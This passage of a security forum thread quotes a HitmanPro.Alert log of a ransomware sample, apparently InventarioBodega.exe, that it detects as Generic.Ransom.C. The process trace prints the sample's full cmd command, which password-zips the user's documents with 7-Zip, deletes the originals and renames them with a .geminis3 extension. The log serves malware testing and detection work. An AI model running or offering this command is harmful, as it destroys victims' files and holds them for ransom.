C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p></p><p>Thumbprints</p><p>5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c</p><p></Data></p><p> </EventData></p><p></Event></p><p>[/SPOILER]</p></blockquote><p></p>
[QUOTE="Vitali Ortzi, post: 876715, member: 57714"] [SPOILER="Hitman Pro Alert ignore Symantec as it was disabled "] Log Name: Application Source: HitmanPro.Alert Date: 27/04/2020 0:43:03 Event ID: 911 Task Category: Mitigation Level: Error Keywords: Classic User: N/A Computer: DESKTOP-9TB3DOM Description: Mitigation CryptoGuard Timestamp 2020-04-26T21:43:03 Platform 10.0.17763/x64 v871 06_17% PID 4132 Application C:\Program Files\7-Zip\7z.exe Created 2020-03-17T07:34:42 Description 7-Zip Console 18.6 Filename C:\Program Files\7-Zip\7z.exe Detection Generic.Ransom.C 1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3 Created L0, Write T8620544 H8620196|^259 #1,2 2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1 3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat Opened L237576, Read T238080|100% H237576|100%|^119672 #3 4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #4 5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #5 6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #6 7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #7 8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip Opened, Deleted L19238769 P4984 #9 9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3 Created L0, Write T19239424 H19239254|^236 P4984 #10,11 10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10 11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12 12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13 13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14 14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15 15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16 16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip Opened, Deleted L4372785 P3368 #18 17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3 Created L0, Write T4373504 H4373093|^306 P3368 #19,20 18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19 25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3 Created L0, Write T5794304 H5793920|^251 P1504 #28,29 26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28 33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3 Created L0, Write T5743104 H5743005|^277 P5240 #38,39 34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38 Loaded Modules (23) ----------------------------------------------------------------------------- 0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov), Version: 18.6.0.0 00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.), Version: 3.8.4.871 00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation), Version: 10.0.17763.1158 000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation), Version: 14.2.5536.2100 000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation), Version: 17.2.1.16 00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation), Version: 10.0.17763.1131 00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation), Version: 7.0.17763.475 00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation), Version: 10.0.17763.1075 00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation), Version: 10.0.17763.864 00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation), Version: 10.0.17763.1 00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation), Version: 10.0.17763.914 00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation), Version: 10.0.17763.1 00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation), Version: 10.0.17763.719 00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation), Version: 10.0.17763.678 00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation), Version: 10.0.17763.1 00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation), Version: 10.0.17763.592 00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation), Version: 10.0.17763.719 000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov), Version: 18.6.0.0 Process Trace 1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03 "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents 2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57 C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d" 3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57 4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07 5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s 6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56 winlogon.exe 7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms \SystemRoot\System32\smss.exe 000000dc 00000084 8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29 \SystemRoot\System32\smss.exe Dropped Files 1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3 Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132] 1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] Thumbprints 5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c Event Xml: <Event xmlns="[URL]http://schemas.microsoft.com/win/2004/08/events/event[/URL]"> <System> <Provider Name="HitmanPro.Alert" /> <EventID Qualifiers="0">911</EventID> <Level>2</Level> <Task>9</Task> <Keywords>0x80000000000000</Keywords> <TimeCreated SystemTime="2020-04-26T21:43:03.542132400Z" /> <EventRecordID>9047</EventRecordID> <Channel>Application</Channel> <Computer>DESKTOP-9TB3DOM</Computer> <Security /> </System> <EventData> <Data>C:\Program Files\7-Zip\7z.exe</Data> <Data>CryptoGuard</Data> <Data>Mitigation CryptoGuard Timestamp 2020-04-26T21:43:03 Platform 10.0.17763/x64 v871 06_17% PID 4132 Application C:\Program Files\7-Zip\7z.exe Created 2020-03-17T07:34:42 Description 7-Zip Console 18.6 Filename C:\Program Files\7-Zip\7z.exe Detection Generic.Ransom.C 1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3 Created L0, Write T8620544 H8620196|^259 #1,2 2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1 3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat Opened L237576, Read T238080|100% H237576|100%|^119672 #3 4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #4 5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #5 6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #6 7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 #7 8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip Opened, Deleted L19238769 P4984 #9 9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3 Created L0, Write T19239424 H19239254|^236 P4984 #10,11 10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10 11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12 12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13 13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14 14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15 15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16 16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip Opened, Deleted L4372785 P3368 #18 17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3 Created L0, Write T4373504 H4373093|^306 P3368 #19,20 18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19 25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3 Created L0, Write T5794304 H5793920|^251 P1504 #28,29 26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28 33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3 Created L0, Write T5743104 H5743005|^277 P5240 #38,39 34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38 Loaded Modules (23) ----------------------------------------------------------------------------- 0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov), Version: 18.6.0.0 00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.), Version: 3.8.4.871 00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation), Version: 10.0.17763.1158 000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation), Version: 14.2.5536.2100 000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation), Version: 17.2.1.16 00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation), Version: 10.0.17763.1131 00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation), Version: 7.0.17763.475 00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation), Version: 10.0.17763.1075 00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation), Version: 10.0.17763.864 00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation), Version: 10.0.17763.1 00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation), Version: 10.0.17763.914 00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation), Version: 10.0.17763.1 00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation), Version: 10.0.17763.719 00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation), Version: 10.0.17763.678 00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation), Version: 10.0.17763.1 00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation), Version: 10.0.17763.592 00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation), Version: 10.0.17763.1158 00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation), Version: 10.0.17763.719 000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov), Version: 18.6.0.0 Process Trace 1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03 "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents 2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57 C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d" 3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57 4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07 5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s 6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56 winlogon.exe 7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms \SystemRoot\System32\smss.exe 000000dc 00000084 8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29 \SystemRoot\System32\smss.exe Dropped Files 1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3 Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132] 1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 19 